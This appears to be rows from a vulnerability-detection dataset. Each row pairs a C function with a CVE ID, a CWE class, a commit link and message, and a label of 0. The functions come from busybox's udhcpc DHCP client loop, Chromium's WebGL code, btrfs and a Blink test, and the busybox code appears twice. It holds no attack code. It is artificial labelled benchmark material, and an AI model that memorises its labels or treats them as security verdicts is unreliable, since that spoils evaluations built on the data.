0 */ change_listen_mode(LISTEN_KERNEL); log1("Entering renew state"); /* fall right through */ case RENEW_REQUESTED: /* manual (SIGUSR1) renew */ case_RENEW_REQUESTED: case RENEWING: if (timeout > 60) { /* send an unicast renew request */ /* Sometimes observed to fail (EADDRNOTAVAIL) to bind * a new UDP socket for sending inside send_renew. * I hazard to guess existing listening socket * is somehow conflicting with it, but why is it * not deterministic then?! Strange. * Anyway, it does recover by eventually failing through * into INIT_SELECTING state. 
*/ send_renew(xid, server_addr, requested_ip); timeout >>= 1; continue; } /* Timed out, enter rebinding state */ log1("Entering rebinding state"); state = REBINDING; /* fall right through */ case REBINDING: /* Switch to bcast receive */ change_listen_mode(LISTEN_RAW); /* Lease is *really* about to run out, * try to find DHCP server using broadcast */ if (timeout > 0) { /* send a broadcast renew request */ send_renew(xid, 0 /*INADDR_ANY*/, requested_ip); timeout >>= 1; continue; } /* Timed out, enter init state */ bb_info_msg("Lease lost, entering init state"); udhcp_run_script(NULL, "deconfig"); state = INIT_SELECTING; client_config.first_secs = 0; /* make secs field count from 0 */ /*timeout = 0; - already is */ packet_num = 0; continue; /* case RELEASED: */ } /* yah, I know, *you* say it would never happen */ timeout = INT_MAX; continue; /* back to main loop */ } /* if select timed out */ /* select() didn't timeout, something happened */ /* Is it a signal? */ /* note: udhcp_sp_read checks FD_ISSET before reading */ switch (udhcp_sp_read(&rfds)) { case SIGUSR1: client_config.first_secs = 0; /* make secs field count from 0 */ already_waited_sec = 0; perform_renew(); if (state == RENEW_REQUESTED) { /* We might be either on the same network * (in which case renew might work), * or we might be on a completely different one * (in which case renew won't ever succeed). * For the second case, must make sure timeout * is not too big, or else we can send * futile renew requests for hours. * (Ab)use -A TIMEOUT value (usually 20 sec) * as a cap on the timeout. */ if (timeout > tryagain_timeout) timeout = tryagain_timeout; goto case_RENEW_REQUESTED; } /* Start things over */ packet_num = 0; /* Kill any timeouts, user wants this to hurry along */ timeout = 0; continue; case SIGUSR2: perform_release(server_addr, requested_ip); timeout = INT_MAX; continue; case SIGTERM: bb_info_msg("Received SIGTERM"); goto ret0; } /* Is it a packet? */ if (listen_mode == LISTEN_NONE || !FD_ISSET(sockfd, &rfds)) continue; /* no */ { int len; /* A packet is ready, read it */ if (listen_mode == LISTEN_KERNEL) len = udhcp_recv_kernel_packet(&packet, sockfd); else len = udhcp_recv_raw_packet(&packet, sockfd); if (len == -1) { /* Error is severe, reopen socket */ bb_info_msg("Read error: %s, reopening socket", strerror(errno)); sleep(discover_timeout); /* 3 seconds by default */ change_listen_mode(listen_mode); /* just close and reopen */ } /* If this packet will turn out to be unrelated/bogus, * we will go back and wait for next one. * Be sure timeout is properly decreased. */ already_waited_sec += (unsigned)monotonic_sec() - timestamp_before_wait; if (len < 0) continue; } if (packet.xid != xid) { log1("xid %x (our is %x), ignoring packet", (unsigned)packet.xid, (unsigned)xid); continue; } /* Ignore packets that aren't for us */ if (packet.hlen != 6 || memcmp(packet.chaddr, client_config.client_mac, 6) != 0 ) { log1("chaddr does not match, ignoring packet"); // log2? continue; } message = udhcp_get_option(&packet, DHCP_MESSAGE_TYPE); if (message == NULL) { bb_error_msg("no message type option, ignoring packet"); continue; } switch (state) { case INIT_SELECTING: /* Must be a DHCPOFFER */ if (*message == DHCPOFFER) { uint8_t *temp; /* What exactly is server's IP? There are several values. 
* Example DHCP offer captured with tchdump: * * 10.34.25.254:67 > 10.34.25.202:68 // IP header's src * BOOTP fields: * Your-IP 10.34.25.202 * Server-IP 10.34.32.125 // "next server" IP * Gateway-IP 10.34.25.254 // relay's address (if DHCP relays are in use) * DHCP options: * DHCP-Message Option 53, length 1: Offer * Server-ID Option 54, length 4: 10.34.255.7 // "server ID" * Default-Gateway Option 3, length 4: 10.34.25.254 // router * * We think that real server IP (one to use in renew/release) * is one in Server-ID option. But I am not 100% sure. * IP header's src and Gateway-IP (same in this example) * might work too. * "Next server" and router are definitely wrong ones to use, though... */ /* We used to ignore pcakets without DHCP_SERVER_ID. * I've got user reports from people who run "address-less" servers. * They either supply DHCP_SERVER_ID of 0.0.0.0 or don't supply it at all. * They say ISC DHCP client supports this case. */ server_addr = 0; temp = udhcp_get_option(&packet, DHCP_SERVER_ID); if (!temp) { bb_error_msg("no server ID, using 0.0.0.0"); } else { /* it IS unaligned sometimes, don't "optimize" */ move_from_unaligned32(server_addr, temp); } /*xid = packet.xid; - already is */ requested_ip = packet.yiaddr; /* enter requesting state */ state = REQUESTING; timeout = 0; packet_num = 0; already_waited_sec = 0; } continue; case REQUESTING: case RENEWING: case RENEW_REQUESTED: case REBINDING: if (*message == DHCPACK) { unsigned start; uint32_t lease_seconds; struct in_addr temp_addr; uint8_t *temp; temp = udhcp_get_option(&packet, DHCP_LEASE_TIME); if (!temp) { bb_error_msg("no lease time with ACK, using 1 hour lease"); lease_seconds = 60 * 60; } else { /* it IS unaligned sometimes, don't "optimize" */ move_from_unaligned32(lease_seconds, temp); lease_seconds = ntohl(lease_seconds); /* paranoia: must not be too small and not prone to overflows */ if (lease_seconds < 0x10) lease_seconds = 0x10; if (lease_seconds >= 0x10000000) lease_seconds = 0x0fffffff; } #if ENABLE_FEATURE_UDHCPC_ARPING if (opt & OPT_a) { /* RFC 2131 3.1 paragraph 5: * "The client receives the DHCPACK message with configuration * parameters. The client SHOULD perform a final check on the * parameters (e.g., ARP for allocated network address), and notes * the duration of the lease specified in the DHCPACK message. At this * point, the client is configured. If the client detects that the * address is already in use (e.g., through the use of ARP), * the client MUST send a DHCPDECLINE message to the server and restarts * the configuration process..." */ if (!arpping(packet.yiaddr, NULL, (uint32_t) 0, client_config.client_mac, client_config.interface, arpping_ms) ) { bb_info_msg("Offered address is in use " "(got ARP reply), declining"); send_decline(/*xid,*/ server_addr, packet.yiaddr); if (state != REQUESTING) udhcp_run_script(NULL, "deconfig"); change_listen_mode(LISTEN_RAW); state = INIT_SELECTING; client_config.first_secs = 0; /* make secs field count from 0 */ requested_ip = 0; timeout = tryagain_timeout; packet_num = 0; already_waited_sec = 0; continue; /* back to main loop */ } } #endif /* enter bound state */ temp_addr.s_addr = packet.yiaddr; bb_info_msg("Lease of %s obtained, lease time %u", inet_ntoa(temp_addr), (unsigned)lease_seconds); requested_ip = packet.yiaddr; start = monotonic_sec(); udhcp_run_script(&packet, state == REQUESTING ? 
"bound" : "renew"); already_waited_sec = (unsigned)monotonic_sec() - start; timeout = lease_seconds / 2; if ((unsigned)timeout < already_waited_sec) { /* Something went wrong. Back to discover state */ timeout = already_waited_sec = 0; } state = BOUND; change_listen_mode(LISTEN_NONE); if (opt & OPT_q) { /* quit after lease */ goto ret0; } /* future renew failures should not exit (JM) */ opt &= ~OPT_n; #if BB_MMU /* NOMMU case backgrounded earlier */ if (!(opt & OPT_f)) { client_background(); /* do not background again! */ opt = ((opt & ~OPT_b) | OPT_f); } #endif /* make future renew packets use different xid */ /* xid = random_xid(); ...but why bother? */ continue; /* back to main loop */ } if (*message == DHCPNAK) { /* If network has more than one DHCP server, * "wrong" server can reply first, with a NAK. * Do not interpret it as a NAK from "our" server. */ if (server_addr != 0) { uint32_t svid; uint8_t *temp; temp = udhcp_get_option(&packet, DHCP_SERVER_ID); if (!temp) { non_matching_svid: log1("%s with wrong server ID, ignoring packet", "Received DHCP NAK" ); continue; } move_from_unaligned32(svid, temp); if (svid != server_addr) goto non_matching_svid; } /* return to init state */ bb_info_msg("Received DHCP NAK"); udhcp_run_script(&packet, "nak"); if (state != REQUESTING) udhcp_run_script(NULL, "deconfig"); change_listen_mode(LISTEN_RAW); sleep(3); /* avoid excessive network traffic */ state = INIT_SELECTING; client_config.first_secs = 0; /* make secs field count from 0 */ requested_ip = 0; timeout = 0; packet_num = 0; already_waited_sec = 0; } continue; /* case BOUND: - ignore all packets */ /* case RELEASED: - ignore all packets */ } /* back to main loop */ } /* for (;;) - main loop ends */ ret0: if (opt & OPT_R) /* release on quit */ perform_release(server_addr, requested_ip); retval = 0; ret: /*if (client_config.pidfile) - remove_pidfile has its own check */ remove_pidfile(client_config.pidfile); return retval; }
int udhcpc_main(int argc UNUSED_PARAM, char **argv) { uint8_t *message; const char *str_V, *str_h, *str_F, *str_r; IF_FEATURE_UDHCPC_ARPING(const char *str_a = "2000";) IF_FEATURE_UDHCP_PORT(char *str_P;) void *clientid_mac_ptr; llist_t *list_O = NULL; llist_t *list_x = NULL; int tryagain_timeout = 20; int discover_timeout = 3; int discover_retries = 3; uint32_t server_addr = server_addr; /* for compiler */ uint32_t requested_ip = 0; uint32_t xid = xid; /* for compiler */ int packet_num; int timeout; /* must be signed */ unsigned already_waited_sec; unsigned opt; IF_FEATURE_UDHCPC_ARPING(unsigned arpping_ms;) int max_fd; int retval; fd_set rfds; /* Default options */ IF_FEATURE_UDHCP_PORT(SERVER_PORT = 67;) IF_FEATURE_UDHCP_PORT(CLIENT_PORT = 68;) client_config.interface = "eth0"; client_config.script = CONFIG_UDHCPC_DEFAULT_SCRIPT; str_V = "udhcp "BB_VER; /* Parse command line */ /* O,x: list; -T,-t,-A take numeric param */ opt_complementary = "O::x::T+:t+:A+" IF_UDHCP_VERBOSE(":vv") ; IF_LONG_OPTS(applet_long_options = udhcpc_longopts;) opt = getopt32(argv, "CV:H:h:F:i:np:qRr:s:T:t:SA:O:ox:fB" USE_FOR_MMU("b") IF_FEATURE_UDHCPC_ARPING("a::") IF_FEATURE_UDHCP_PORT("P:") "v" , &str_V, &str_h, &str_h, &str_F , &client_config.interface, &client_config.pidfile, &str_r /* i,p */ , &client_config.script /* s */ , &discover_timeout, &discover_retries, &tryagain_timeout /* T,t,A */ , &list_O , &list_x IF_FEATURE_UDHCPC_ARPING(, &str_a) IF_FEATURE_UDHCP_PORT(, &str_P) IF_UDHCP_VERBOSE(, &dhcp_verbose) ); if (opt & (OPT_h|OPT_H)) { bb_error_msg("option -h NAME is deprecated, use -x hostname:NAME"); client_config.hostname = alloc_dhcp_option(DHCP_HOST_NAME, str_h, 0); } if (opt & OPT_F) { /* FQDN option format: [0x51][len][flags][0][0]<fqdn> */ client_config.fqdn = alloc_dhcp_option(DHCP_FQDN, str_F, 3); /* Flag bits: 0000NEOS * S: 1 = Client requests server to update A RR in DNS as well as PTR * O: 1 = Server indicates to client that DNS has been updated regardless * E: 1 = Name is in DNS format, i.e. <4>host<6>domain<3>com<0>, * not "host.domain.com". Format 0 is obsolete. * N: 1 = Client requests server to not update DNS (S must be 0 then) * Two [0] bytes which follow are deprecated and must be 0. 
*/ client_config.fqdn[OPT_DATA + 0] = 0x1; /*client_config.fqdn[OPT_DATA + 1] = 0; - xzalloc did it */ /*client_config.fqdn[OPT_DATA + 2] = 0; */ } if (opt & OPT_r) requested_ip = inet_addr(str_r); #if ENABLE_FEATURE_UDHCP_PORT if (opt & OPT_P) { CLIENT_PORT = xatou16(str_P); SERVER_PORT = CLIENT_PORT - 1; } #endif IF_FEATURE_UDHCPC_ARPING(arpping_ms = xatou(str_a);) while (list_O) { char *optstr = llist_pop(&list_O); unsigned n = bb_strtou(optstr, NULL, 0); if (errno || n > 254) { n = udhcp_option_idx(optstr); n = dhcp_optflags[n].code; } client_config.opt_mask[n >> 3] |= 1 << (n & 7); } if (!(opt & OPT_o)) { unsigned i, n; for (i = 0; (n = dhcp_optflags[i].code) != 0; i++) { if (dhcp_optflags[i].flags & OPTION_REQ) { client_config.opt_mask[n >> 3] |= 1 << (n & 7); } } } while (list_x) { char *optstr = llist_pop(&list_x); char *colon = strchr(optstr, ':'); if (colon) *colon = ' '; /* now it looks similar to udhcpd's config file line: * "optname optval", using the common routine: */ udhcp_str2optset(optstr, &client_config.options); } if (udhcp_read_interface(client_config.interface, &client_config.ifindex, NULL, client_config.client_mac) ) { return 1; } clientid_mac_ptr = NULL; if (!(opt & OPT_C) && !udhcp_find_option(client_config.options, DHCP_CLIENT_ID)) { /* not suppressed and not set, set the default client ID */ client_config.clientid = alloc_dhcp_option(DHCP_CLIENT_ID, "", 7); client_config.clientid[OPT_DATA] = 1; /* type: ethernet */ clientid_mac_ptr = client_config.clientid + OPT_DATA+1; memcpy(clientid_mac_ptr, client_config.client_mac, 6); } if (str_V[0] != '\0') { client_config.vendorclass = alloc_dhcp_option(DHCP_VENDOR, str_V, 0); } #if !BB_MMU /* on NOMMU reexec (i.e., background) early */ if (!(opt & OPT_f)) { bb_daemonize_or_rexec(0 /* flags */, argv); logmode = LOGMODE_NONE; } #endif if (opt & OPT_S) { openlog(applet_name, LOG_PID, LOG_DAEMON); logmode |= LOGMODE_SYSLOG; } /* Make sure fd 0,1,2 are open */ bb_sanitize_stdio(); /* Equivalent of doing a fflush after every \n */ setlinebuf(stdout); /* Create pidfile */ write_pidfile(client_config.pidfile); /* Goes to stdout (unless NOMMU) and possibly syslog */ bb_info_msg("%s (v"BB_VER") started", applet_name); /* Set up the signal pipe */ udhcp_sp_setup(); /* We want random_xid to be random... */ srand(monotonic_us()); state = INIT_SELECTING; udhcp_run_script(NULL, "deconfig"); change_listen_mode(LISTEN_RAW); packet_num = 0; timeout = 0; already_waited_sec = 0; /* Main event loop. select() waits on signal pipe and possibly * on sockfd. * "continue" statements in code below jump to the top of the loop. */ for (;;) { struct timeval tv; struct dhcp_packet packet; /* silence "uninitialized!" warning */ unsigned timestamp_before_wait = timestamp_before_wait; /* Was opening raw or udp socket here * if (listen_mode != LISTEN_NONE && sockfd < 0), * but on fast network renew responses return faster * than we open sockets. Thus this code is moved * to change_listen_mode(). Thus we open listen socket * BEFORE we send renew request (see "case BOUND:"). */ max_fd = udhcp_sp_fd_set(&rfds, sockfd); tv.tv_sec = timeout - already_waited_sec; tv.tv_usec = 0; retval = 0; /* If we already timed out, fall through with retval = 0, else... */ if ((int)tv.tv_sec > 0) { log1("Waiting on select %u seconds", (int)tv.tv_sec); timestamp_before_wait = (unsigned)monotonic_sec(); retval = select(max_fd + 1, &rfds, NULL, NULL, &tv); if (retval < 0) { /* EINTR? 
A signal was caught, don't panic */ if (errno == EINTR) { already_waited_sec += (unsigned)monotonic_sec() - timestamp_before_wait; continue; } /* Else: an error occured, panic! */ bb_perror_msg_and_die("select"); } } /* If timeout dropped to zero, time to become active: * resend discover/renew/whatever */ if (retval == 0) { /* When running on a bridge, the ifindex may have changed * (e.g. if member interfaces were added/removed * or if the status of the bridge changed). * Refresh ifindex and client_mac: */ if (udhcp_read_interface(client_config.interface, &client_config.ifindex, NULL, client_config.client_mac) ) { goto ret0; /* iface is gone? */ } if (clientid_mac_ptr) memcpy(clientid_mac_ptr, client_config.client_mac, 6); /* We will restart the wait in any case */ already_waited_sec = 0; switch (state) { case INIT_SELECTING: if (!discover_retries || packet_num < discover_retries) { if (packet_num == 0) xid = random_xid(); /* broadcast */ send_discover(xid, requested_ip); timeout = discover_timeout; packet_num++; continue; } leasefail: udhcp_run_script(NULL, "leasefail"); #if BB_MMU /* -b is not supported on NOMMU */ if (opt & OPT_b) { /* background if no lease */ bb_info_msg("No lease, forking to background"); client_background(); /* do not background again! */ opt = ((opt & ~OPT_b) | OPT_f); } else #endif if (opt & OPT_n) { /* abort if no lease */ bb_info_msg("No lease, failing"); retval = 1; goto ret; } /* wait before trying again */ timeout = tryagain_timeout; packet_num = 0; continue; case REQUESTING: if (!discover_retries || packet_num < discover_retries) { /* send broadcast select packet */ send_select(xid, server_addr, requested_ip); timeout = discover_timeout; packet_num++; continue; } /* Timed out, go back to init state. * "discover...select...discover..." loops * were seen in the wild. Treat them similarly * to "no response to discover" case */ change_listen_mode(LISTEN_RAW); state = INIT_SELECTING; goto leasefail; case BOUND: /* 1/2 lease passed, enter renewing state */ state = RENEWING; client_config.first_secs = 0; /* make secs field count from 0 */ change_listen_mode(LISTEN_KERNEL); log1("Entering renew state"); /* fall right through */ case RENEW_REQUESTED: /* manual (SIGUSR1) renew */ case_RENEW_REQUESTED: case RENEWING: if (timeout > 60) { /* send an unicast renew request */ /* Sometimes observed to fail (EADDRNOTAVAIL) to bind * a new UDP socket for sending inside send_renew. * I hazard to guess existing listening socket * is somehow conflicting with it, but why is it * not deterministic then?! Strange. * Anyway, it does recover by eventually failing through * into INIT_SELECTING state. 
*/ send_renew(xid, server_addr, requested_ip); timeout >>= 1; continue; } /* Timed out, enter rebinding state */ log1("Entering rebinding state"); state = REBINDING; /* fall right through */ case REBINDING: /* Switch to bcast receive */ change_listen_mode(LISTEN_RAW); /* Lease is *really* about to run out, * try to find DHCP server using broadcast */ if (timeout > 0) { /* send a broadcast renew request */ send_renew(xid, 0 /*INADDR_ANY*/, requested_ip); timeout >>= 1; continue; } /* Timed out, enter init state */ bb_info_msg("Lease lost, entering init state"); udhcp_run_script(NULL, "deconfig"); state = INIT_SELECTING; client_config.first_secs = 0; /* make secs field count from 0 */ /*timeout = 0; - already is */ packet_num = 0; continue; /* case RELEASED: */ } /* yah, I know, *you* say it would never happen */ timeout = INT_MAX; continue; /* back to main loop */ } /* if select timed out */ /* select() didn't timeout, something happened */ /* Is it a signal? */ /* note: udhcp_sp_read checks FD_ISSET before reading */ switch (udhcp_sp_read(&rfds)) { case SIGUSR1: client_config.first_secs = 0; /* make secs field count from 0 */ already_waited_sec = 0; perform_renew(); if (state == RENEW_REQUESTED) { /* We might be either on the same network * (in which case renew might work), * or we might be on a completely different one * (in which case renew won't ever succeed). * For the second case, must make sure timeout * is not too big, or else we can send * futile renew requests for hours. * (Ab)use -A TIMEOUT value (usually 20 sec) * as a cap on the timeout. */ if (timeout > tryagain_timeout) timeout = tryagain_timeout; goto case_RENEW_REQUESTED; } /* Start things over */ packet_num = 0; /* Kill any timeouts, user wants this to hurry along */ timeout = 0; continue; case SIGUSR2: perform_release(server_addr, requested_ip); timeout = INT_MAX; continue; case SIGTERM: bb_info_msg("Received SIGTERM"); goto ret0; } /* Is it a packet? */ if (listen_mode == LISTEN_NONE || !FD_ISSET(sockfd, &rfds)) continue; /* no */ { int len; /* A packet is ready, read it */ if (listen_mode == LISTEN_KERNEL) len = udhcp_recv_kernel_packet(&packet, sockfd); else len = udhcp_recv_raw_packet(&packet, sockfd); if (len == -1) { /* Error is severe, reopen socket */ bb_info_msg("Read error: %s, reopening socket", strerror(errno)); sleep(discover_timeout); /* 3 seconds by default */ change_listen_mode(listen_mode); /* just close and reopen */ } /* If this packet will turn out to be unrelated/bogus, * we will go back and wait for next one. * Be sure timeout is properly decreased. */ already_waited_sec += (unsigned)monotonic_sec() - timestamp_before_wait; if (len < 0) continue; } if (packet.xid != xid) { log1("xid %x (our is %x), ignoring packet", (unsigned)packet.xid, (unsigned)xid); continue; } /* Ignore packets that aren't for us */ if (packet.hlen != 6 || memcmp(packet.chaddr, client_config.client_mac, 6) != 0 ) { log1("chaddr does not match, ignoring packet"); // log2? continue; } message = udhcp_get_option(&packet, DHCP_MESSAGE_TYPE); if (message == NULL) { bb_error_msg("no message type option, ignoring packet"); continue; } switch (state) { case INIT_SELECTING: /* Must be a DHCPOFFER */ if (*message == DHCPOFFER) { uint8_t *temp; /* What exactly is server's IP? There are several values. 
* Example DHCP offer captured with tchdump: * * 10.34.25.254:67 > 10.34.25.202:68 // IP header's src * BOOTP fields: * Your-IP 10.34.25.202 * Server-IP 10.34.32.125 // "next server" IP * Gateway-IP 10.34.25.254 // relay's address (if DHCP relays are in use) * DHCP options: * DHCP-Message Option 53, length 1: Offer * Server-ID Option 54, length 4: 10.34.255.7 // "server ID" * Default-Gateway Option 3, length 4: 10.34.25.254 // router * * We think that real server IP (one to use in renew/release) * is one in Server-ID option. But I am not 100% sure. * IP header's src and Gateway-IP (same in this example) * might work too. * "Next server" and router are definitely wrong ones to use, though... */ /* We used to ignore pcakets without DHCP_SERVER_ID. * I've got user reports from people who run "address-less" servers. * They either supply DHCP_SERVER_ID of 0.0.0.0 or don't supply it at all. * They say ISC DHCP client supports this case. */ server_addr = 0; temp = udhcp_get_option(&packet, DHCP_SERVER_ID); if (!temp) { bb_error_msg("no server ID, using 0.0.0.0"); } else { /* it IS unaligned sometimes, don't "optimize" */ move_from_unaligned32(server_addr, temp); } /*xid = packet.xid; - already is */ requested_ip = packet.yiaddr; /* enter requesting state */ state = REQUESTING; timeout = 0; packet_num = 0; already_waited_sec = 0; } continue; case REQUESTING: case RENEWING: case RENEW_REQUESTED: case REBINDING: if (*message == DHCPACK) { unsigned start; uint32_t lease_seconds; struct in_addr temp_addr; uint8_t *temp; temp = udhcp_get_option(&packet, DHCP_LEASE_TIME); if (!temp) { bb_error_msg("no lease time with ACK, using 1 hour lease"); lease_seconds = 60 * 60; } else { /* it IS unaligned sometimes, don't "optimize" */ move_from_unaligned32(lease_seconds, temp); lease_seconds = ntohl(lease_seconds); /* paranoia: must not be too small and not prone to overflows */ if (lease_seconds < 0x10) lease_seconds = 0x10; if (lease_seconds >= 0x10000000) lease_seconds = 0x0fffffff; } #if ENABLE_FEATURE_UDHCPC_ARPING if (opt & OPT_a) { /* RFC 2131 3.1 paragraph 5: * "The client receives the DHCPACK message with configuration * parameters. The client SHOULD perform a final check on the * parameters (e.g., ARP for allocated network address), and notes * the duration of the lease specified in the DHCPACK message. At this * point, the client is configured. If the client detects that the * address is already in use (e.g., through the use of ARP), * the client MUST send a DHCPDECLINE message to the server and restarts * the configuration process..." */ if (!arpping(packet.yiaddr, NULL, (uint32_t) 0, client_config.client_mac, client_config.interface, arpping_ms) ) { bb_info_msg("Offered address is in use " "(got ARP reply), declining"); send_decline(/*xid,*/ server_addr, packet.yiaddr); if (state != REQUESTING) udhcp_run_script(NULL, "deconfig"); change_listen_mode(LISTEN_RAW); state = INIT_SELECTING; client_config.first_secs = 0; /* make secs field count from 0 */ requested_ip = 0; timeout = tryagain_timeout; packet_num = 0; already_waited_sec = 0; continue; /* back to main loop */ } } #endif /* enter bound state */ temp_addr.s_addr = packet.yiaddr; bb_info_msg("Lease of %s obtained, lease time %u", inet_ntoa(temp_addr), (unsigned)lease_seconds); requested_ip = packet.yiaddr; start = monotonic_sec(); udhcp_run_script(&packet, state == REQUESTING ? 
"bound" : "renew"); already_waited_sec = (unsigned)monotonic_sec() - start; timeout = lease_seconds / 2; if ((unsigned)timeout < already_waited_sec) { /* Something went wrong. Back to discover state */ timeout = already_waited_sec = 0; } state = BOUND; change_listen_mode(LISTEN_NONE); if (opt & OPT_q) { /* quit after lease */ goto ret0; } /* future renew failures should not exit (JM) */ opt &= ~OPT_n; #if BB_MMU /* NOMMU case backgrounded earlier */ if (!(opt & OPT_f)) { client_background(); /* do not background again! */ opt = ((opt & ~OPT_b) | OPT_f); } #endif /* make future renew packets use different xid */ /* xid = random_xid(); ...but why bother? */ continue; /* back to main loop */ } if (*message == DHCPNAK) { /* If network has more than one DHCP server, * "wrong" server can reply first, with a NAK. * Do not interpret it as a NAK from "our" server. */ if (server_addr != 0) { uint32_t svid; uint8_t *temp; temp = udhcp_get_option(&packet, DHCP_SERVER_ID); if (!temp) { non_matching_svid: log1("%s with wrong server ID, ignoring packet", "Received DHCP NAK" ); continue; } move_from_unaligned32(svid, temp); if (svid != server_addr) goto non_matching_svid; } /* return to init state */ bb_info_msg("Received DHCP NAK"); udhcp_run_script(&packet, "nak"); if (state != REQUESTING) udhcp_run_script(NULL, "deconfig"); change_listen_mode(LISTEN_RAW); sleep(3); /* avoid excessive network traffic */ state = INIT_SELECTING; client_config.first_secs = 0; /* make secs field count from 0 */ requested_ip = 0; timeout = 0; packet_num = 0; already_waited_sec = 0; } continue; /* case BOUND: - ignore all packets */ /* case RELEASED: - ignore all packets */ } /* back to main loop */ } /* for (;;) - main loop ends */ ret0: if (opt & OPT_R) /* release on quit */ perform_release(server_addr, requested_ip); retval = 0; ret: /*if (client_config.pidfile) - remove_pidfile has its own check */ remove_pidfile(client_config.pidfile); return retval; }
C
busybox
0
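The udhcpc state machine in the record above retries by halving the remaining lease time on every unanswered renew/rebind request (timeout >>= 1), which bounds the number of retransmissions per lease period. A minimal sketch of that back-off, with hypothetical stand-ins (lease_remaining, send_request) rather than the actual busybox variables:

    /* illustrative sketch of the timeout-halving retry loop above;
     * lease_remaining and send_request() are hypothetical stand-ins */
    unsigned lease_remaining = lease_seconds / 2;   /* start renewing at T1 */
    while (lease_remaining > 60) {                  /* unicast renew phase */
        send_request();                             /* one renew attempt */
        lease_remaining >>= 1;                      /* wait, then halve */
    }
    /* below 60s the client falls through to broadcast rebinding,
     * and on lease expiry back to the initial discover state */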
CVE-2017-5112
https://www.cvedetails.com/cve/CVE-2017-5112/
CWE-119
https://github.com/chromium/chromium/commit/f6ac1dba5e36f338a490752a2cbef3339096d9fe
f6ac1dba5e36f338a490752a2cbef3339096d9fe
Reset ES3 pixel pack parameters and PIXEL_PACK_BUFFER binding in DrawingBuffer before ReadPixels() and restore them later. BUG=740603 TEST=new conformance test [email protected],[email protected] Change-Id: I3ea54c6cc34f34e249f7c8b9f792d93c5e1958f4 Reviewed-on: https://chromium-review.googlesource.com/570840 Reviewed-by: Antoine Labour <[email protected]> Reviewed-by: Kenneth Russell <[email protected]> Commit-Queue: Zhenyao Mo <[email protected]> Cr-Commit-Position: refs/heads/master@{#486518}
WebGLFramebuffer* WebGL2RenderingContextBase::GetReadFramebufferBinding() { return read_framebuffer_binding_.Get(); }
WebGLFramebuffer* WebGL2RenderingContextBase::GetReadFramebufferBinding() { return read_framebuffer_binding_.Get(); }
C
Chrome
0
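The fix described in the commit message above follows a save/reset/restore pattern around glReadPixels(): pack state left behind by user ES3 calls must not influence an internal readback. A hedged sketch using standard OpenGL ES 3.0 entry points (width, height, and pixels are assumed to be in scope; the actual Chromium code differs):

    GLint pack_buffer = 0, row_length = 0, skip_rows = 0, skip_pixels = 0;
    glGetIntegerv(GL_PIXEL_PACK_BUFFER_BINDING, &pack_buffer);  /* save */
    glGetIntegerv(GL_PACK_ROW_LENGTH, &row_length);
    glGetIntegerv(GL_PACK_SKIP_ROWS, &skip_rows);
    glGetIntegerv(GL_PACK_SKIP_PIXELS, &skip_pixels);
    glBindBuffer(GL_PIXEL_PACK_BUFFER, 0);       /* read into client memory */
    glPixelStorei(GL_PACK_ROW_LENGTH, 0);        /* neutralize pack state */
    glPixelStorei(GL_PACK_SKIP_ROWS, 0);
    glPixelStorei(GL_PACK_SKIP_PIXELS, 0);
    glReadPixels(0, 0, width, height, GL_RGBA, GL_UNSIGNED_BYTE, pixels);
    glPixelStorei(GL_PACK_SKIP_PIXELS, skip_pixels);  /* restore */
    glPixelStorei(GL_PACK_SKIP_ROWS, skip_rows);
    glPixelStorei(GL_PACK_ROW_LENGTH, row_length);
    glBindBuffer(GL_PIXEL_PACK_BUFFER, pack_buffer);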
CVE-2012-5375
https://www.cvedetails.com/cve/CVE-2012-5375/
CWE-310
https://github.com/torvalds/linux/commit/9c52057c698fb96f8f07e7a4bcf4801a092bda89
9c52057c698fb96f8f07e7a4bcf4801a092bda89
Btrfs: fix hash overflow handling The handling for directory crc hash overflows was fairly obscure, split_leaf returns EOVERFLOW when we try to extend the item and that is supposed to bubble up to userland. For a while it did so, but along the way we added better handling of errors and forced the FS readonly if we hit IO errors during the directory insertion. Along the way, we started testing only for EEXIST and the EOVERFLOW case was dropped. The end result is that we may force the FS readonly if we catch a directory hash bucket overflow. This fixes a few problem spots. First I add tests for EOVERFLOW in the places where we can safely just return the error up the chain. btrfs_rename is harder though, because it tries to insert the new directory item only after it has already unlinked anything the rename was going to overwrite. Rather than adding very complex logic, I added a helper to test for the hash overflow case early while it is still safe to bail out. Snapshot and subvolume creation had a similar problem, so they are using the new helper now too. Signed-off-by: Chris Mason <[email protected]> Reported-by: Pascal Junod <[email protected]>
static noinline void async_cow_free(struct btrfs_work *work) { struct async_cow *async_cow; async_cow = container_of(work, struct async_cow, work); if (async_cow->inode) btrfs_add_delayed_iput(async_cow->inode); kfree(async_cow); }
static noinline void async_cow_free(struct btrfs_work *work) { struct async_cow *async_cow; async_cow = container_of(work, struct async_cow, work); if (async_cow->inode) btrfs_add_delayed_iput(async_cow->inode); kfree(async_cow); }
C
linux
0
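The btrfs commit message above boils down to propagating EOVERFLOW from directory-item insertion instead of treating it like a fatal I/O error. A hedged call-site sketch; the helper names here are placeholders, not the exact btrfs functions:

    ret = insert_dir_item(trans, dir, name, name_len);  /* placeholder helper */
    if (ret == -EEXIST || ret == -EOVERFLOW)
        return ret;              /* hash-bucket overflow: bubble up to userland */
    if (ret)
        abort_transaction(ret);  /* real I/O errors may still force read-only */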
CVE-2013-2908
https://www.cvedetails.com/cve/CVE-2013-2908/
null
https://github.com/chromium/chromium/commit/7edf2c655761e7505950013e62c89e3bd2f7e6dc
7edf2c655761e7505950013e62c89e3bd2f7e6dc
Call didAccessInitialDocument when javascript: URLs are used. BUG=265221 TEST=See bug for repro. Review URL: https://chromiumcodereview.appspot.com/22572004 git-svn-id: svn://svn.chromium.org/blink/trunk@155790 bbb929c8-8fbe-4397-9dbb-9b2b20218538
WebFrameTest() : m_baseURL("http://www.test.com/") , m_chromeURL("chrome://") , m_webView(0) { }
WebFrameTest() : m_baseURL("http://www.test.com/") , m_chromeURL("chrome://") , m_webView(0) { }
C
Chrome
0
CVE-2011-4029
https://www.cvedetails.com/cve/CVE-2011-4029/
CWE-362
https://cgit.freedesktop.org/xorg/xserver/commit/?id=b67581cf825940fdf52bf2e0af4330e695d724a4
b67581cf825940fdf52bf2e0af4330e695d724a4
null
